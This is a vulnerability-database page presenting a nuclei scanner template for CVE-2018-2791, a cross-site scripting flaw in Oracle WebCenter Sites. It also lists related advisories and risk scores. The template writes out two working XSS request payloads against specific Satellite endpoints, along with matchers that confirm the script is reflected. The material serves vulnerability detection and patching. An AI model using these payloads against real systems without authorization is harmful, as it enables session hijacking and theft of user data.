Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 52 Views

Oracle Fusion Middleware WebCenter Sites - Cross-Site Scriptin

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting Vulnerability
25 May 201800:00
zdt
Circl		CVE-2018-2791
25 May 201800:00
circl
CNVD		Oracle Fusion Middleware WebCenter Sites Component Unauthorized Operation Vulnerability
9 May 201800:00
cnvd
CVE		CVE-2018-2791
19 Apr 201802:00
cve
Cvelist		CVE-2018-2791
19 Apr 201802:00
cvelist
Exploit DB		Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting
25 May 201800:00
exploitdb
exploitpack		Oracle WebCenter Sites 11.1.1.8.012.2.1.x - Cross-Site Scripting
25 May 201800:00
exploitpack
NVD		CVE-2018-2791
19 Apr 201802:29
nvd
Oracle		Oracle Critical Patch Update - April 2018
17 Apr 201800:00
oracle
Tenable Nessus		Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)
20 Apr 201800:00
nessus
Rows per page
id: CVE-2018-2791

info:
  name: Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting
  author: madrobot,leovalcante
  severity: high
  description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches provided by Oracle to address this vulnerability.
  reference:
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
    - http://web.archive.org/web/20211206165005/https://securitytracker.com/id/1040695
    - https://www.exploit-db.com/exploits/44752/
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://nvd.nist.gov/vuln/detail/CVE-2018-2791
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2018-2791
    epss-score: 0.3945
    epss-percentile: 0.98429
    cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: webcenter_sites
  tags: cve2018,cve,edb,oracle,xss,wcs,vuln

http:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{BaseURL}}
      - |
        GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
        Host: {{BaseURL}}

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'

      - type: word
        part: body
        words:
          - '<script>alert(24)</script>'
          - 'Missing translation key'
        condition: and
# digest: 4b0a00483046022100d7bab36b6cdb80e71cfce05c6270aa760e78a47a6c581ba9d7665f12559e7fd6022100dab48a490ddfba505e2d0d3b6845b87eaf98e6aec22a8a9496de0c679b47070b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25.8
CVSS 38.2
EPSS0.3945
SSVC
oraclefusion middlewarewebcenter sitescross-site scriptingvulnerabilityunauthorized accesshttpattackers
52